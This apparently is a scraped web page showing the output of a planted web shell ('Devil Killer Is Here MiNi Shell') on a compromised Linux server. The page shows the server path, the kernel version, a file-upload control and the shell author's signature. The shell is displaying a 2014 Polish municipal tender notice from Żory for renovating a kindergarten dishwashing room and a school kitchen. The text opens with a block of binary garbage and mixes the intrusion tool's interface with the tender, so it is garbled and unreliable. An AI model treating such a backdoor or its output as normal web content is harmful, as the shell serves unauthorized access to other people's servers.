JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140523/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140523/175048-N-2014.html

<p class="kh_header"><b>Żory: Wykonanie  robót budowlanych w obiektach oświatowych w Żorach.</b><br>
<b>Numer ogłoszenia: 175048 - 2014; data zamieszczenia: 23.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Żory , Al. Wojska Polskiego 25, 44-240 Żory, woj. śląskie, tel. 32 4348245, faks 32 4348248.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  robót budowlanych w obiektach oświatowych w Żorach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie  robót budowlanych w obiektach oświatowych w Żorach
Zamówienie zostało podzielone na 2 części:
Część 1 Modernizacja pomieszczeń zmywalni w P-16  na os. Sikorskiego w Żorach   
Część 2 Modernizacja pomieszczeń kuchni w SP nr 3  na os. 700-lecia w Żorach

Zamawiający dopuszcza możliwość składania ofert częściowych.

Szczegółowy opis przedmiotu zamówienia zawierają:
a)dokumentacja projektowa,
b)specyfikacje techniczne wykonania i odbioru robót,
c)przedmiary robót. 

Przedmiotem zamówienia jest: 
Część 1 - Modernizacja pomieszczeń zmywalni w P-16  na os. Sikorskiego w Żorach   

a)zakres robót ogólnobudowlanych

Remont pomieszczeń zmywalni zlokalizowanych w budynku przedszkola na poziomie parteru i piętra a w szczególności:
-Wykonanie prac demontażowych: wykucie starych drzwi, skucie płytek ściennych i posadzkowych, rozebranie ścianek działowych, demontaż starych szaf przelotowych. 
-Wykonanie nowych ścianek działowych.
-Docieplenie szczeliny dylatacyjnej oraz prace tynkarskie.
-Montaż nowych drzwi w tym drzwi ppoż. EI30.
-Obłożenie ścian płytkami szkliwionymi 20x20 cm w kolorze beżowym wraz z przygotowaniem powierzchni ścian.  
-Ułożenie na posadzkach płytek 30x30 cm  w kolorze oliwkowym o właściwościach nie poślizgowych wraz z przygotowaniem powierzchni posadzek i wykonaniem izolacji przeciwwodnej.
-Wykonanie gładzi na sufitach i ścianach (nad płytkami).
-Malowanie ścian i sufitów farbami lateksowymi o podwyższonej odporności na szorowanie i działanie wilgoci.
-Dostawa i montaż elementów wyposażenia zmywalni: szafy, szafki wiszące, stoły, zlewy wykonane z blachy ze stali nierdzewnej o grubości minimalnej 0,8 mm (blaty o grubości minimalnej 1,0 mm) - przystosowane do kontaktu z żywnością i  posiadające atesty higieniczne, 
Nie należy wyceniać zmywarek.
-Inne prace wyszczególnione w przedmiarze robót.

b)Zakres robót elektrycznych
-Wymiana instalacji elektrycznej z zmywalni na parterze i na piętrze w tym oświetlenie, zasilanie urządzeń zmywalni, zasilanie dźwigu towarowego,
-Ułożenie nowej wewnętrznej linii zasilającej z TG do T1 i T2 w przedszkolu,
-Wykonanie instalacji wyłączenia pożarowego central oddymiania dla przedszkola i żłobka,
-Wykonanie instalacji sterowania wyłącznikiem pożarowym prądu przy wejściu do przedszkola,
-Ułożenie przewodów zasilających centralę oddymiania przedszkola (bez zabudowy centrali oddymiania).

c)Zakres robót sanitarnych

-przebudowa instalacji wody i kanalizacji sanitarnej.

Dołączona do SIWZ dokumentacja projektowa Dostosowanie klatki schodowej do wymogów ppoż. oraz przebudowa zmywalni w Przedszkolu nr 16  obejmuje swoim zakresem dostosowanie klatki schodowej do wymogów ppoż., która nie jest przedmiotem zamówienia.


Część 2 - Modernizacja pomieszczeń kuchni w SP nr 3  na os. 700-lecia w Żorach

a)zakres robót ogólnobudowlanych

-Wykonanie prac demontażowych: wykucie starych drzwi, skucie płytek ściennych,
skucie posadzek lastrykowych.
-Montaż nowych drzwi w tym drzwi z okienkiem podawczym.
-Montaż okienka podawczego z blatem.
-Obłożenie ścian płytkami szkliwionymi 20x20 cm w kolorze beżowym wraz z przygotowaniem powierzchni ścian.  
-Ułożenie na posadzkach płytek 30x30 cm  w kolorze oliwkowym o właściwościach nie poślizgowych wraz z przygotowaniem powierzchni posadzek i wykonaniem izolacji przeciwwodnej.
-Wykonanie gładzi na sufitach i ścianach (nad płytkami).
-Malowanie ścian i sufitów farbami lateksowymi o podwyższonej odporności na szorowanie i działanie wilgoci.
-Inne prace wyszczególnione w przedmiarze robót.

b)Zakres robót elektrycznych

-Wymiana instalacji elektrycznej w kuchni i pomieszczeniach zaplecza socjalno - magazynowego w tym oświetlenie, zasilanie urządzeń gastronomicznych, chłodniczych i wentylacji,
-Wymiana tablicy rozdzielczej T8,
-Ułożenie nowej wewnętrznej linii zasilającej z TG do T8.

c)Zakres robót sanitarnych

-Wymiana instalacji wod - kan..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.40.00.00-1, 45.32.40.00-4, 45.43.00.00-0, 45.42.10.00-4, 45.44.21.00-8, 45.31.00.00-3, 45.31.51.00-9, 45.31.12.00-2, 45.31.11.00-1, 45.33.20.00-3, 39.14.10.00-2, 45.30.00.00-0, 45.33.30.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota: 
część 1 - 2.000,00  (słownie: dwa tysiące złotych 0/00),
część 2 - 1.500,00 (słownie: tysiąc pięćset złotych 0/00),</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wskaże osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialne za kierowanie robotami budowlanymi w specjalności konstrukcyjno-budowlanej, instalacyjnej w zakresie sieci i instalacji elektrycznych oraz instalacyjnej  w zakresie sieci instalacji sanitarnych (uprawnienia w zakresie kierowania, nadzorowania   i kontrolowania budowy) wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami w przypadku ubiegania się o udzielenie zamówienia na realizację jednej lub dwóch części jednocześnie.
W przypadku osób posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane. Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed dniem wejścia w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy - w oparciu o art. 104 ustawy z dnia 7 lipca 1994r. - Prawo budowlane (Dz. U. z 2003r. Nr 207, poz. 2016 ze zmianami).
Wykonawca oświadczy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia lub inny dokument potwierdzający ten fakt - jeżeli Wykonawca polega na zasobach innych  podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. Przyczyna/okoliczności    
Wystąpienie zdarzeń losowych - klęska żywiołowa
Skutek - zmiana w umowie/aneks
Zmiana terminu wykonania zadania o tyle dni, ile trwało wstrzymanie robót 
II. Przyczyna/okoliczności    
Zmiana przepisów o podatku od towarów i usług.                                                          
Skutek - zmiana w umowie/aneks
zmniejszenie/zwiększenie wynagrodzenia brutto wykonawcy; kwota zostanie zmieniona zgodnie ze zmianą stawki VAT 
III. Przyczyna/okoliczności                                         
Przekształcenie firmy, zmiana nazwy firmy
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy uwzględniającego dokonanie przekształcenia firmy.
IV. Przyczyna/okoliczności                                         
Rezygnacja z części robót na skutek sytuacji niemożliwej wcześniej do przewidzenia
Skutek - zmiana w umowie/aneks
Zmniejszenie wynagrodzenia wykonawcy o kwotę, którą należałoby zapłacić gdyby przedmiotowe roboty zostały wykonane.
V. Przyczyna/okoliczności                                         
Zmiana  lub rezygnacja z podwykonawcy będącego podmiotem na zasobach którego opierał się wykonawca w celu spełnienia warunków udziału w postępowaniu na zasadach art. 26 ust.2b.
Skutek - zmiana w umowie/aneks
Wprowadzenie (Podwykonawca lub Wykonawca) innego podmiotu który potwierdza spełnienie warunków w stopniu nie mniejszym niż wymagany w SIWZ 
VI. Przyczyna/okoliczności                                         
Potrzeba wprowadzenia lub zmiany zakresu robót wykonywanych przez podwykonawcę z przyczyn niezależnych od Wykonawcy
Skutek - zmiana w umowie/aneks
Spisania aneksu do umowy określającego zakres robót wykonywanych przez podwykonawcę.
VII. Przyczyna/okoliczności                                         
Wstrzymanie prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę.
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy wydłużającego termin wykonania robót o tyle dni ile trwało wstrzymanie robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zory.pl  menu przedmiotowe: Przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żory, Aleja Wojska Polskiego 25, 44-240 Żory, pokój 203, II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2014 godzina 12:00, miejsce: Urząd Miasta Żory, Al. Wojska Polskiego 25, 44-240 Żory pok. INFORMACJA - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja pomieszczeń zmywalni w P-16  na os. Sikorskiego w Żorach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)zakres robót ogólnobudowlanych
Remont pomieszczeń zmywalni zlokalizowanych w budynku przedszkola na poziomie parteru i piętra a w szczególności:
-Wykonanie prac demontażowych: wykucie starych drzwi, skucie płytek ściennych i posadzkowych, rozebranie ścianek działowych, demontaż starych szaf przelotowych. 
-Wykonanie nowych ścianek działowych.
-Docieplenie szczeliny dylatacyjnej oraz prace tynkarskie.
- Montaż nowych drzwi w tym drzwi ppoż. EI30.
-Obłożenie ścian płytkami szkliwionymi 20x20 cm w kolorze beżowym wraz z przygotowaniem powierzchni ścian.  
-Ułożenie na posadzkach płytek 30x30 cm  w kolorze oliwkowym o właściwościach nie poślizgowych wraz z przygotowaniem powierzchni posadzek i wykonaniem izolacji przeciwwodnej.
-Wykonanie gładzi na sufitach i ścianach (nad płytkami).
-Malowanie ścian i sufitów farbami lateksowymi o podwyższonej odporności na szorowanie i działanie wilgoci.
-Dostawa i montaż elementów wyposażenia zmywalni: szafy, szafki wiszące, stoły, zlewy wykonane z blachy ze stali nierdzewnej o grubości minimalnej 0,8 mm (blaty o grubości minimalnej 1,0 mm) - przystosowane do kontaktu z żywnością i  posiadające atesty higieniczne, 
Nie należy wyceniać zmywarek.
-Inne prace wyszczególnione w przedmiarze robót.

b)Zakres robót elektrycznych
-Wymiana instalacji elektrycznej z zmywalni na parterze i na piętrze w tym oświetlenie, zasilanie urządzeń zmywalni, zasilanie dźwigu towarowego,
-Ułożenie nowej wewnętrznej linii zasilającej z TG do T1 i T2 w przedszkolu,
-Wykonanie instalacji wyłączenia pożarowego central oddymiania dla przedszkola i żłobka,
-Wykonanie instalacji sterowania wyłącznikiem pożarowym prądu przy wejściu do przedszkola,
-Ułożenie przewodów zasilających centralę oddymiania przedszkola (bez zabudowy centrali oddymiania).

c)Zakres robót sanitarnych
-przebudowa instalacji wody i kanalizacji sanitarnej.

Dołączona do SIWZ dokumentacja projektowa Dostosowanie klatki schodowej do wymogów ppoż. oraz przebudowa zmywalni w Przedszkolu nr 16  obejmuje swoim zakresem dostosowanie klatki schodowej do wymogów ppoż., która nie jest przedmiotem zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.40.00.00-1, 45.32.40.00-4, 45.43.00.00-0, 45.42.10.00-4, 45.44.21.00-8, 45.31.00.00-3, 45.31.51.00-9, 45.31.12.00-2, 45.31.11.00-1, 45.33.20.00-3, 39.14.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja pomieszczeń kuchni w SP nr 3  na os. 700-lecia w Żorach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)zakres robót ogólnobudowlanych
-Wykonanie prac demontażowych: wykucie starych drzwi, skucie płytek ściennych,
skucie posadzek lastrykowych.
-Montaż nowych drzwi w tym drzwi z okienkiem podawczym.
-Montaż okienka podawczego z blatem.
-Obłożenie ścian płytkami szkliwionymi 20x20 cm w kolorze beżowym wraz z przygotowaniem powierzchni ścian.  
-Ułożenie na posadzkach płytek 30x30 cm  w kolorze oliwkowym o właściwościach nie poślizgowych wraz z przygotowaniem powierzchni posadzek i wykonaniem izolacji przeciwwodnej.
-Wykonanie gładzi na sufitach i ścianach (nad płytkami).
-Malowanie ścian i sufitów farbami lateksowymi o podwyższonej odporności na szorowanie i działanie wilgoci.
-Inne prace wyszczególnione w przedmiarze robót.

b)Zakres robót elektrycznych
-Wymiana instalacji elektrycznej w kuchni i pomieszczeniach zaplecza socjalno - magazynowego w tym oświetlenie, zasilanie urządzeń gastronomicznych, chłodniczych i wentylacji,
-Wymiana tablicy rozdzielczej T8,
-Ułożenie nowej wewnętrznej linii zasilającej z TG do T8.

c)Zakres robót sanitarnych
-Wymiana instalacji wod - kan..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.40.00.00-1, 45.32.40.00-4, 45.43.00.00-0, 45.42.10.00-4, 45.44.21.00-8, 45.31.00.00-3, 45.31.51.00-9, 45.31.12.00-2, 45.31.11.00-1, 45.30.00.00-0, 45.33.30.00-0, 45.33.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com